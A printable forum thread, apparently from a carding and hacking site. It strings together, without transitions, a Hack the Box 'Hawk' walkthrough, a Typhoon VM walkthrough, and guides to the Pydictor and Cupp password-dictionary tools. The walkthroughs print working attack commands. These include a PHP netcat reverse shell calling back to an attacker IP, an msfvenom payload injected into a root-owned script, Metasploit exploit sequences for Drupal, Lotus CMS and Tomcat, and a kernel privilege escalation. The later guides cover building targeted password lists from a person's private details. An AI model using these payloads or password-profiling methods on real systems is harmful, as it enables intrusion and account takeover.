[Guide] How to Hack the Box: Hawk Walkthrough

[Guide] How to Hack the Box: Hawk Walkthrough - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Hack the Box: Hawk Walkthrough (/Thread-Guide-How-to-Hack-the-Box-Hawk-Walkthrough)

[Guide] How to Hack the Box: Hawk Walkthrough - NINZA - 05-14-2020

Today we are going to solve another CTF challenge “Hawk”. Hawk is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are online available therefore they have static IP. The IP of Hawk is 10.10.10.102
Penetration Methodology:

Port scanning and IP discovery
Anonymous FTP Login
Checking file type
Getting Login Credentials
Browsing IP through port 80
Exploiting Drupal
Reading First Flag User.txt
Getting Login Credentials
Spawning TTY Shell
Searching exploit via Searchsploit
Getting root Access
Reading Final Flag Root.txt

Walkthrough
Let’s start off with our basic nmap command to find out the open ports and running services.
nmap -A 10.10.10.102
1
nmap -A 10.10.10.102
[Image: 1.png?w=687&ssl=1]

The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082 (h2 database http console).
From the NMAP Scan output, we saw that ftp Port 21 is Open and the next thing that catches our eyes is that it has Anonymous login allowed.
ftp 10.10.10.102
1
ftp 10.10.10.102
We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file i.e. “.drupal.txt.enc “and then we transferred the file to our local machine.
[Image: 2.png?w=687&ssl=1]

Since .drupa.txt.enc is encrypted. Let’s check the file type using the ‘file’ command.
file .drupal.txt.enc
1
file .drupal.txt.enc
[Image: 3.png?w=687&ssl=1]

It came out to be OpenSSL encoded data with a salted password. Clearly, we need to decrypt the file to get any further clue.
To crack this file, we have used an OpenSSL bruteforce tool which is easily available on GitHub. You can download it from the given below link or can run the following command for downloading and script execution.
git clone

[To see content please register here]

./openssl-brute --file /root/.drupal.txt.enc
1
2
git clone

[To see content please register here]

./openssl-brute --file /root/.drupal.txt.enc
Boom!! We have successfully cracked the file and the Password Hint we got is “PencilKeyboardScanner123” this could be the password for CMS Login. Let’s Check it.
[Image: 4.png?w=687&ssl=1]

As port 80 is running http server, we open the target machine’s IP address in our browser and found out it’s a Drupal Login Page. To Login this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.
[Image: 6.png?w=687&ssl=1]

Oh yeah!! We have successfully logged into the admin dashboard. Now go to modules and then enable the checkbox for Path and PHP filter.
[Image: 7.png?w=687&ssl=1]

After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.
Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f"); ?>
1
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f"); ?>
Then select the Text format as “PHP code”. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.
nc -lvp 1234
1
nc -lvp 1234
[Image: 8.png?w=687&ssl=1]

We got a reverse connection of the victim’s machine on our netcat listener. To spawn the proper shell we have used python3 bin bash shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
1
python3 -c 'import pty;pty.spawn("/bin/bash")'
Inside /home/denial we have got to User.txt flag, now time to find the root flag. While exploring through directories, we thought of reading the contents of the “settings.php” file, in this file we found the password: drupal4hawk
cat settings.php | grep password
1
cat settings.php | grep password
[Image: 9.png?w=687&ssl=1]

Then with the following command, we switch the user and logged in as user daniel.
su daniel
Password: drupal4hawk
1
2
su daniel
Password: drupal4hawk
Here we have used Simple phyton3 commands to escape the python3 interpreter.
>>import pty
>>pty.spawn('/bin/bash')
1
2
>>import pty
>>pty.spawn('/bin/bash')
[Image: 10.1.png?w=687&ssl=1]

From Nmap scan output we notice that “H2 database running on port 8082”, therefore we search out for H2 database exploit in searchsploit.
searchsploit H2 database
1
searchsploit H2 database
It came out to be a Remote Code Execution. The exploit we have used is highlighted, after that, we have copied the exploit 45506.py in the /root directory and run a Python server to download the file in the target machine.
searchsploit -m 45506
python -m SimpleHTTPServer 8080
1
2
searchsploit -m 45506
python -m SimpleHTTPServer 8080
[Image: 10.png?w=687&ssl=1]

Afterward, we have downloaded our exploit 45506.py in the /tmp directory of the target machine. Then Grant the FULL permission to the exploit and execute it using the command.
cd /tmp
wget

[To see content please register here]

chmod 777 45506.py
python3 45506.py –H 127.0.0.1:8082
id
1
2
3
4
5
cd /tmp
wget

[To see content please register here]

chmod 777 45506.py
python3 45506.py –H 127.0.0.1:8082
id
Finally!! We have got the root access. Now let’s go and get the “root.txt”. We take a look at the content of the file and found our final flag.
[Image: 11.png?w=687&ssl=1]

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering, and DNS attacks. Prisma training involves the practical use of Typhoon.
Download it from here:

[To see content please register here]

Penetrating Methodology

Network Scanning (Netdiscover, Nmap)
1st method of exploiting via exploring MongoDB
Consider robots.txt
Explore /MongoDB over browser
Identify credential
SSH Login
Find out kernel version
Kernel privilege escalation
Obtain root access
2nd method of exploiting via tomcat manager (Metasploit)
Generating bash payload
Uploading bash payload
Obtain root access
3rd Method: Exploiting Drupal CMS
4th Method: Exploiting Lotus CMS

Since there are multiple ways in which we can exploit this machine. Therefore we have used two methods to capture the flag as follows:
Method 1: Exploiting by exploring MongoDB
Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our targets IP.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We found our target IP –> 192.168.1.101
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
1
nmap -A 192.168.1.101
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgrespl), 8080(http).
Further, we notice that there is an entry /monoadmin/ in robot.txt as it might be useful.
[Image: 2.png?w=687&ssl=1]

We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This could be another way of exploiting this machine. But will see to it later on.
[Image: 3.png?w=687&ssl=1]

Moving on, Since port 80 is also open. So, we browsed the found directory /mongoadmin/ into the browser. The result displayed is shown in the image. Here we set the change the database to credentials(84mb). It will display a link of 2 Credentials. Click on it.
[Image: 4.png?w=687&ssl=1]

Clicking on the 2 Credential link will give us Credentials [username]:typhoon and [password]:789456123 . These credentials might be a great help for further enumeration.
[Image: 5.png?w=687&ssl=1]

After some time, we just strike with an idea WHY NOT USE THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.
Then we simply logged in SSH with CREDENTIALS Username: typhoon & Password: 789456123
ssh [email protected]
1
ssh [email protected]
Then we checked system information and found out Ubuntu 14.04 is running on the target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.
[Image: 6.png?w=687&ssl=1]

Next, we look for an exploit for ubuntu 14.04 using searchsploit. The exploit we have used have highlighted, after that, we have copied the exploit 37292.c in the /root/ directory. Executing a Python server to download the file in the target machine.
searchsploit ubuntu 14.04
1
searchsploit ubuntu 14.04
[Image: 7.png?w=687&ssl=1]

Afterward, we have downloaded our exploit 37292.c in the /tmp directory. After compilation and granting permissions to the exploit. We have executed it.
cd /tmp
wget

[To see content please register here]

ls
gcc 37292.c -o rootshell
chmod 777 rootshell
./rootshell
cd /root
ls
cat root-flag
1
2
3
4
5
6
7
8
9
cd /tmp
wget

[To see content please register here]

ls
gcc 37292.c -o rootshell
chmod 777 rootshell
./rootshell
cd /root
ls
cat root-flag
Booyah!! We have got the root access and found our FLAG. We take a look at the content of the file and greeted with a congratulatory message.
[Image: 8.png?w=687&ssl=1]

Method 2: Exploiting via Tomcat Manager
Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.
Let’s Begin with the Walkthrough!!
Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s browse the Target IP on port 8080 on the browser.
[Image: 9.png?w=687&ssl=1]

We are very familiar with Tomcat Server Login using manager web app due to our previous lab experiences. Without wasting time we straight away logged into Tomcat Server using Metasploit Tomcat Manager using the Default credentials for Tomcat Server Login.
[username]:tomcat
[password]:tomcat
1
2
[username]:tomcat
[password]:tomcat
Oh Yeah! We have got a meterpreter. After spending a lot of time of enumeration, we found a directory /tab which consists of file script.sh that is owned by root and has FULL Permission. So we thought of inserting malicious code in script.sh.
use exploit/multi/http/tomcat_mgr_upload
set rhost 192.168.1.101
set rport 8080
set httpusername tomcat
set httppassword tomcat
exploit
1
2
3
4
5
6
use exploit/multi/http/tomcat_mgr_upload
set rhost 192.168.1.101
set rport 8080
set httpusername tomcat
set httppassword tomcat
exploit
[Image: 10.png?w=687&ssl=1]

Moving on!! We need to create a bash code using Msfvenom:
msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R
1
msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R
After that, append the above generated malicious code in the script.sh file.
[Image: 11.png?w=687&ssl=1]

echo "mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0</tmp/vvwjo | /bin/sh >/tmp/vvwjo 2>&1; rm /tmp/vvwjo" > script.sh
1
echo "mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0</tmp/vvwjo | /bin/sh >/tmp/vvwjo 2>&1; rm /tmp/vvwjo" > script.sh
[Image: 12.png?w=687&ssl=1]

Since the malicious code got executed with the script.sh file. Therefore we got a reverse shell on our netcat listener.
Yeah!! We have got the root access and found root-flag. We take a look at the content of the file and greeted with a congratulatory message.
[Image: 12.png?w=687&ssl=1]

Method 3: Exploiting Drupal CMS
Unfortunately, on exploring port 80 we didn’t observe any remarkable things, therefore, we try to enumerate web directory with the help of Dirb tool.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

It was wonderful to observe that there was two CMS as highlighted in the below image.
[Image: 17.png?w=687&ssl=1]

On exploring /Drupal in the web browser, it put up the following web page which was associated with Drupal cms.
Without wasting time, we chase towards Metasploit and run the following module to exploit Drupal cms.
use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit
1
2
3
4
use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit
Booom!! It was a terrific moment to see the meterpreter session of the target machine. Now for the post exploitation, you can follow the above methodology which we have already discussed in the 1st method.
[Image: 18.png?w=687&ssl=1]

Method 4: Exploiting Lotus CMS
Scroll up and kindly notice the result which we have obtained from the dirb scan, there we had found two CMS. We had already exploit Drupal, now let’s go for next CMS and try to exploit it, if possible
So on exploring /cms in the web browser, it put up the following web page which was associated with Lotus cms.
[Image: 19.png?w=687&ssl=1]

Without wasting must time, again we chase towards Metasploit and run the following module to exploit lotus cms.
use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit
1
2
3
4
use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit
[Image: 20.png?w=687&ssl=1]

Great, we have owned another meterpreter session of the target machine. Now for the post-exploitation you can follow the above methodology which we have already discussed in the 1st method.

In this article, we will explore another dictionary building tool “Pydictor”. These tools are always fun to work with, this is another robust tool perfect for generating custom dictionaries. The thing that stands out most about this tool is the customization options it offers, from the most common to the advance.
Table of Content

What is Pydictor
Installation
Numeric Dictionary
Lower Case Alphabet Dictionary
Upper Case Alphabet Dictionary
Numeral Coupled With Upper Case Alphabet
Upper Case Coupled With Lower Case Alphabet
Numeral Coupled With Lower Case Alphabet
Combining Upper Case, Lower Case, and Numeral
Adding Static Head
Adding Static Tail
Encoding
Character Permutation
Multiple Character Group Permutation
Social Engineering Dictionary
Customizing the Social Engineering Dictionary
Manipulating Dictionary Complexity Filter
Using Plugin
Leet Function

What is Pydictor
Pydictor is one of those tools that both novices and pro can appreciate. It is a dictionary building tool that is great to have in your arsenal when dealing with password strength tests. The tool offers a plethora of features which can be used to create that perfect dictionary for pretty much any kind of testing situation.
Installation
Let’s get cracking, the first thing we do is download Pydictor from GitHub and run it using Python. The moment the tool is executed, the running commands are visible to see other optional arguments.
git clone

[To see content please register here]

cd pydictor
python pydictor.py
1
2
3
git clone

[To see content please register here]

cd pydictor
python pydictor.py
[Image: 1.png?w=687&ssl=1]

Numeric Dictionary
We are beginning by exploring the option to create a numeric or as described by the tool, digital, dictionary. Let’s start by keeping it simple, only 5 characters long and limited to 0 – 5. We will be using the “-base” option to accomplish this.
The output is saved by default but in this case, we will be saving it to “dict.txt”. The storage location will always appear after each execution. The “cat” command is used to view the output in the terminal.
python pydictor.py --len 5 5 -base d -o dict.txt
1
python pydictor.py --len 5 5 -base d -o dict.txt
[Image: 2.png?w=687&ssl=1]

Alphabet Dictionary
We will be making a dictionary which only holds lower case alphabets, the length of the words will remain to 5 characters.
python pydictor.py --len 5 5 -base L
1
python pydictor.py --len 5 5 -base L
[Image: 3.png?w=687&ssl=1]

Upper Case Alphabet Dictionary
We will now generate a dictionary with all the same metrics as earlier with the exception of changing the base option to upper case alphabets.
The result is visible to see.
python pydictor.py --len 5 5 -base c
1
python pydictor.py --len 5 5 -base c
[Image: 4.png?w=687&ssl=1]

Numeric Coupled With Upper Case Alphabet
The base options in Pydictor can be used in conjunction with each other, in this instance, we will be coupling numeric (d) and upper case alphabets ©. Let’s see what kind of output we get.
python pydictor.py --len 5 5 -base dc
1
python pydictor.py --len 5 5 -base dc
[Image: 5.png?w=687&ssl=1]

Upper Case Coupled With Lower Case Alphabet
This time it’s going to be both upper and lower case alphabets together.
python pydictor.py --len 5 5 -base Lc
1
python pydictor.py --len 5 5 -base Lc
[Image: 6.png?w=687&ssl=1]

Numeral Coupled With Lower Case Alphabet
Let’s see what we get when we couple numerals with lower case alphabets.
python pydictor.py --len 5 5 -base dL
1
python pydictor.py --len 5 5 -base dL
[Image: 7.png?w=687&ssl=1]

Combining Upper Case, Lower Case, and Numeral
Now let’s combine all the 3 options that we’ve been playing. We will now combine the upper case, lower case, and numeral. To keep the output moving quicker we will limit the word length to 3 characters.
python pydictor.py --len 3 3 -base dLc
1
python pydictor.py --len 3 3 -base dLc
[Image: 8.png?w=687&ssl=1]

Adding Static Head
We will now be adding a static head to all the words, note that the head is in addition to the 5 character length that is set. In this instance, we will be adding “raj” as a static head in front of all the numerals.
python pydictor.py --len 5 5 --head raj -base d
1
python pydictor.py --len 5 5 --head raj -base d
[Image: 9.png?w=687&ssl=1]

Adding Static Tail
We will now be adding a static tail to all the words, note that as mentioned in the instance above, the tail is in addition to the 5 character length that is set. In this instance, we will be adding “raj” as a static tail at the end of all the numerals.
python pydictor.py --len 5 5 --tail raj -base d
1
python pydictor.py --len 5 5 --tail raj -base d
[Image: 10.png?w=687&ssl=1]

Encoding
Pydictor has an encode function that we can use to encode the words in the dictionary.
It gives us the option to choose from popular encoding algorithms such as Base64, DES, AES, MD5, SHA256, etc. In this instance, we will be using Base64 as our algorithm of choice to encode numerals.
In the interest of thoroughness, we will first generate the numerals without encoding and then with encoding.
python pydictor.py --len 5 5 –base d
1
python pydictor.py --len 5 5 –base d
[Image: 11.png?w=687&ssl=1]

Now we see what the Base64 encoded output looks like
python pydictor.py --len 5 5 -base d --encode b64
1
python pydictor.py --len 5 5 -base d --encode b64
[Image: 12.png?w=687&ssl=1]

Character Permutation
We can use a permutation of a single word, Pydictor lets us choose a word and churn out as many permutations of it as possible.
python pydictor.py -char raj
1
python pydictor.py -char raj
[Image: 13.png?w=687&ssl=1]

Multiple Character Group Permutation
We’ll take Pydictor’s permutation prowess one step further by using the “-chunk” option.
This time we will be giving it multiple groups of characters which it will take and churn out as many permutations as possible. It begins in a subtle way by just manipulating one word and then gradually moves on to the others. Notice the progression in the screenshot below.
python pydictor.py -chunk abc ABC 666 . _ @ "'"
1
python pydictor.py -chunk abc ABC 666 . _ @ "'"
[Image: 14.png?w=687&ssl=1]

Social Engineering Dictionary
Pydictor comes with an inbuilt social engineering dictionary builder that lets testers input information from profiling an individual to get a custom-tailored dictionary. We run the “help desk” within the social engineering dictionary builder option to see the various defaults it has to offer.
python pydictor.py --sedb
1
python pydictor.py --sedb
[Image: 15.png?w=687&ssl=1]

Customizing the Social Engineering Dictionary
“show option” is used within the social engineering dictionary builder to set the various vectors from profiling a target to generate a target-specific dictionary. In this instance, we will only be inputting the name, birth date, and email and phone number. The vectors are set using the “set” command.
[Image: 16.png?w=687&ssl=1]

Let’s see what our social engineering dictionary output looks like.
[Image: 17.png?w=687&ssl=1]

Manipulating Dictionary Complexity Filter
We will be doing two things in this instance, we will be extending a dictionary based on a rule and separating words filtered according to complexity level. The complexity level is set to 3 by default, we will take it up a notch by setting it to 4. The character length is set to a minimum of 1 and a maximum of 6.
We view the latter part of the output.
python pydictor.py -extend raj --level 4 --len 1 6
1
python pydictor.py -extend raj --level 4 --len 1 6
[Image: 18.png?w=687&ssl=1]

Using Plugin
Pydictor has plugins built into it by default, we will be using a plugin that bases its generation on the last 6 digits of a Chinese resident ID card number. We will filter it using the “-occur” function. The occur option lets us defines with the following; letter, numeral, and special character, in that order. We will only be looking for results that have numerals occurring 4 times or more in a single string.
python pydictor.py -plug pid6 --types ">=0" ">=4" ">=0"
1
python pydictor.py -plug pid6 --types ">=0" ">=4" ">=0"
[Image: 19.png?w=687&ssl=1]

Leet Function
The leet function can selectively substitute numerals or special characters in the place of alphabets to illustrate; leet turns to L331. We will be using the leet function in conjunction with the occur option and extend function.
This is a more complex task that we have made from Pydictor than our earlier instances, let’s see what our output looks like.
python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10" ">0" "<=2"
1
python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10" ">0" "<=2"
[Image: 20.png?w=687&ssl=1]

We hope you enjoyed our little walkthrough of Pydictor. As mentioned earlier, dictionary generators are always a handy thing to have in your arsenal of pentesting tools. This tool gives the user a lot of advanced options which can a bit overwhelming unless the user has a very clear picture of what they want out of this tool.
Don’t be afraid of taking Pydictor for a spin and see what more you can derive out of it.
Stay tuned for more articles on the latest and greatest in hacking.

Hello Friends!! Today we are going explore the function of Cupp which is an authoritative tool that creates a wordlist especially particular for a person that can be used while making brute force attack for guessing login credential.
Table of Content

Introduction to Cupp
How Cupp Works
Getting Started
Generating Custom Dictionary
Adding to Custom Dictionary
Downloading Dictionaries from Cupp Repository
Downloading Default Usernames and Passwords
Quiet Mode

Introduction to Cupp
Cupp stands for Common User Passwords Profiler and this tool can be used in many circumstances like license penetration tests or forensic crime investigations, CUPP is a cross-platform and written in Python and it’s functioning is simple but with very powerful results. This application is a social engineer’s best friend when it comes to creating targeted password dictionaries which are tailored to an individual.
How Cupp Works
Cupp takes vectors from the profiling done for an individual, such as their nickname, pets name, child’s birthdate, etc. It works on the principle that a password is, more often, a combination of things known to an individual. These known things are often personal details that are very close to a person’s heart.
In cases when a person might use special notations in place of alphabets (e.g: leet can be written as 133t) Cupp has you covered.
Installation and Configuration
Cupp can be downloaded from GitHub using the “git clone” command. Within the downloaded Cupp folder, run the “cup.py” file. Once the file is run, the program shows you the various options it has to offer.
git clone

[To see content please register here]

cd cupp
ls
./cupp.py
1
2
3
4
git clone

[To see content please register here]

cd cupp
ls
./cupp.py
Optional Arguments:
-i Interactive questions for user password profiling
-w FILENAME Use this option to profile an existing dictionary,
-l Download huge wordlists from a repository
-a Parse default usernames and passwords directly from Alecto DB.
Project Alecto uses purified databases of Phenoelit and CIRT which merged and enhanced.
-v Version of the program
[Image: 1.png?w=687&ssl=1]

Generating Custom Dictionary
Now it’s time to have some fun!
We will be using the interactive option to generate the custom dictionary. You will see that we have the option to input options such as pet’s name, child’s name, partners nickname, etc. All these things are highly personal and very common to find these things in a password, one way or another.
There’s also an option to add any specific keywords, special characters, and random numbers. Apart from all this, there’s the option to activate Leet mode, this will make the generated dictionary extremely effective.
That’s all, the dictionary now gets made and saved.
./cupp.py -i
1
./cupp.py -i
[Image: 2.png?w=687&ssl=1]

Adding to Custom Dictionary
Cupp gives us the option to add more words to our created dictionary. We can customize the kind of words we would like to add by using the provided options.
./cupp.py -w raj.txt
1
./cupp.py -w raj.txt
Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case, our location for output is /root/cupp /raj.txt.cupp.txt
[Image: 3.png?w=687&ssl=1]

Downloading Dictionaries from Cupp Repository
Cupp has its own repositories of dictionaries which are pre-classified. These dictionaries can be downloaded and used. The downloaded files are compressed and have to be uncompressed to be viewed.
Enter the number to choose a name to select the dictionary you want to download, we have pressed 16 and downloaded to view a dictionary of Hindi names.
./cupp.py –l
cd dictionaries
cd hindi
gzip -d hindu-names.gz
cat hindu-names
1
2
3
4
5
./cupp.py –l
cd dictionaries
cd hindi
gzip -d hindu-names.gz
cat hindu-names
[Image: 4.png?w=687&ssl=1]

Downloading Default Usernames and Passwords
Cupp can download premade dictionaries holding the most common usernames and passwords from the project Alecto database for usage.
./cupp.py –a
ls
cat alectodb-passwords.txt
1
2
3
./cupp.py –a
ls
cat alectodb-passwords.txt
[Image: 5.png?w=687&ssl=1]

Quiet Mode
Quiet mode is for running Cupp in a more hush-hush way. If you’re the kind of person who does not want a big banner on their screen showing everyone what you’re doing, you’ll like this option. This basically makes for a cleaner screen while cupp is carrying out the commands you’re giving it, without the funny cow popping up on top.
We’re going the couple the quiet mode option with the dictionary download option that we demonstrated above.
./cupp.py -a -q
1
./cupp.py -a -q
We hope you enjoyed this basic walkthrough of the Cupp application. It is very handy and easy to use the tool when it comes to making custom dictionaries. Go ahead and see if it can guess your password.
Stay tuned for more articles on the latest and greatest in hacking!!!
[Image: 6.png?w=687&ssl=1]